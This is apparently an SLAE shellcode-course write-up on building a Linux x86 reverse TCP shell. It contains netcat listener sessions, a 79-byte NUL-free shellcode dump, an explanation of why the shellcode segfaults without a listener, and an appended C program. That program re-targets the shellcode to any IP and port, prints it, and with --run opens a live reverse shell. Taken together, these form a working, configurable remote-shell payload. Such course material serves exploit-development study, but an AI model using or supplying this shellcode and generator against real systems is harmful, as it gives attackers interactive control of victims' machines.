SLAE: Assignment 2 of 7

Assignment #2 objectives:
- Create a shell_reverse_tcp assembly shellcode which:
  - Reverse connects to configured IP and Port
  - Execs shell on successful connection
  - IP and Port should be easily configurable
==========================================

Similar to assignment #1, where we were asked to write a bind shell, assignment #2 focuses on the more useful reverse shell. I'll reuse much of the assignment #1 code as the starting point for this exercise.

DESCRIPTION (from the connect(2) man page)
The connect() system call connects the socket referred to by the file descriptor sockfd to the address specified by addr. The addrlen argument specifies the size of addr. The format of the address in addr is determined by the address space of the socket sockfd; see socket(2) for further details.

In summary, this is what we need to do to create a reverse shell:
- create a TCP socket with socket()
- connect() it to the remote IP and remote port
- duplicate the connected socket onto stdin, stdout and stderr with dup2()
- execve() /bin/sh, which now reads from and writes to the socket

We'll modify the existing bindshell.nasm code from assignment #1: the bind(), listen() and accept() calls of the bind shell are replaced by a single connect() to the configured address, and the socket returned by socket() is the one we dup2() and hand to /bin/sh.

We compile the assembly code and test it:

We start a netcat listener in a new window:

We can now start the file as follows:

We successfully receive a connection on our listener, and we can enter commands:
slae@slae-VirtualBox:~$ nc -nlv 5555
Connection from 127.0.0.1 port 5555 [tcp/*] accepted
whoami
slae

The code can be optimized in a similar way as in assignment 1:

We grab the shellcode bytes from the assembled program:

\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80
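As an added example (mine, not part of the original write-up or the SLAE course material), here is a C companion to the byte dump above. It shows the same socket/connect/dup2/execve sequence in plain C, including the connect() return check the shellcode omits, and it re-targets the 79 bytes to a new IP and port while refusing any combination that would introduce a NUL byte (127.1.1.1 in the dump still reaches the loopback interface but, unlike 127.0.0.1, contains no zero byte). The offsets 17 and 24 are read off the dump; the file name rs.c and the --run flag are my choices.

```c
/* Added example (mine, not the SLAE author's code): C companion to the
 * 79-byte reverse shell dumped above.  IP_OFF/PORT_OFF are read from the dump. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

#define SC_LEN   79
#define IP_OFF   17   /* imm32 of "mov eax, <ip>"  (b8 7f 01 01 01) */
#define PORT_OFF 24   /* imm16 of "mov ax, <port>" (66 b8 15 b3)    */

/* The byte dump from the page: connects to 127.1.1.1:5555, no NUL bytes. */
static const uint8_t template_sc[SC_LEN] = {
    0x31,0xc0,0x50,0x40,0x50,0x5b,0x50,0x40,0x50,0xb0,0x66,0x89,0xe1,0xcd,0x80,
    0x97,0xb8,0x7f,0x01,0x01,0x01,0x50,0x66,0xb8,0x15,0xb3,0x43,0x66,0x50,0x66,
    0x53,0x43,0x89,0xe1,0x31,0xc0,0xb0,0x10,0x50,0x51,0x57,0xb0,0x66,0x89,0xe1,
    0xcd,0x80,0x87,0xcb,0x87,0xdf,0x49,0xb0,0x3f,0xcd,0x80,0x75,0xf9,0x50,0x50,
    0x59,0x5a,0x50,0xb0,0x0b,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
    0x87,0xe3,0xcd,0x80
};

/* sockaddr_in laid out exactly as the shellcode pushes it:
 * push <ip>; push word <port>; push word AF_INET  ->  02 00 | port | ip */
int build_sockaddr(const char *ip, uint16_t port, struct sockaddr_in *sa)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* Plain-C version of the shellcode's syscall sequence.  Returns -1 on any
 * failure; on success execve() replaces the process and never returns. */
int reverse_shell(const char *ip, uint16_t port)
{
    struct sockaddr_in sa;
    if (build_sockaddr(ip, port, &sa) < 0) return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    /* The check the shellcode omits: with no listener connect() fails. */
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) { close(fd); return -1; }
    for (int i = 2; i >= 0; i--)          /* stderr, stdout, stdin: same order as the dec ecx loop */
        if (dup2(fd, i) < 0) return -1;
    char path[] = "/bin//sh";             /* the same "/bin//sh" the shellcode pushes */
    char *const argv[] = { path, NULL };
    execve(path, argv, NULL);
    return -1;
}

/* Index of the first NUL byte in buf, or -1 if there is none. */
int first_nul(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return (int)i;
    return -1;
}

/* Re-target the template.  Returns 0 on success, -1 if ip does not parse,
 * -2 if the result contains a NUL: a zero octet (127.0.0.1) or a port with a
 * zero byte (below 256, or a multiple of 256) would truncate the shellcode
 * when it is handled as a C string. */
int build_reverse_shell(const char *ip, uint16_t port, uint8_t out[SC_LEN])
{
    struct sockaddr_in sa;
    if (build_sockaddr(ip, port, &sa) < 0) return -1;
    memcpy(out, template_sc, SC_LEN);
    memcpy(out + IP_OFF, &sa.sin_addr, 4);     /* both already in network byte order */
    memcpy(out + PORT_OFF, &sa.sin_port, 2);
    return first_nul(out, SC_LEN) < 0 ? 0 : -2;
}

/* Render as "\x.." for a C test harness; out needs 4*len+1 bytes. */
void hex_escape(const uint8_t *buf, size_t len, char *out)
{
    for (size_t i = 0; i < len; i++)
        sprintf(out + 4 * i, "\\x%02x", buf[i]);
}

int main(int argc, char **argv)
{
    if (argc < 3) { fprintf(stderr, "usage: %s <ip> <port> [--run]\n", argv[0]); return 1; }
    uint16_t port = (uint16_t)atoi(argv[2]);
    uint8_t sc[SC_LEN];
    char text[4 * SC_LEN + 1];
    int rc = build_reverse_shell(argv[1], port, sc);
    if (rc == -1) { fprintf(stderr, "bad ip: %s\n", argv[1]); return 1; }
    if (rc == -2) { fprintf(stderr, "NUL at offset %d, pick another ip/port\n", first_nul(sc, SC_LEN)); return 1; }
    hex_escape(sc, SC_LEN, text);
    printf("Shellcode Length: %d\n\"%s\"\n", SC_LEN, text);
    if (argc > 3 && strcmp(argv[3], "--run") == 0)   /* runs the C model, not the bytes */
        return reverse_shell(argv[1], port) < 0 ? 1 : 0;
    return 0;
}
```

Build with gcc -o rs rs.c. ./rs 127.1.1.1 5555 prints exactly the 79 bytes shown above; ./rs 127.0.0.1 5555 is rejected because the address has two zero octets, as is any port below 256. With a listener started by nc -nlv 5555, ./rs 127.1.1.1 5555 --run hands it a shell; without a listener it exits with status 1 instead of faulting, because connect()'s return value is checked.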

I reused the code from assignment 1 and added an option to easily set the IP.

We start a netcat listener in a separate window:

With the listener bound to port 1234 on all local IP addresses, we run the reverse shell, which connects back to it:

We see a successful connection in our netcat terminal:
Connection from 127.0.0.1 port 1234 [tcp/*] accepted

If no listener is set up, we get a segmentation fault:

Shellcode Length:  79
Segmentation fault (core dumped)

The segfault is not caused by /bin/sh being started on a non-existent file descriptor; /bin/sh is never started. Following the 79 bytes above with no listener: socket() succeeds, but connect() fails with ECONNREFUSED and leaves -111 (0xffffff91) in eax. The shellcode then loads the next system call numbers with mov al, 0x3f (dup2) and mov al, 0x0b (execve), which only replaces the low byte, so the upper three bytes keep the 0xffffff of the error return. The kernel rejects those numbers with -ENOSYS, neither dup2() nor execve() runs, and after the last int 0x80 execution runs off the end of the shellcode with esp still holding the socket descriptor value left there by xchg esp, ebx. Hence the crash. A more robust version checks connect()'s return value (test eax, eax; js to an exit) or clears eax with xor eax, eax before each mov al, at the cost of a few extra bytes.
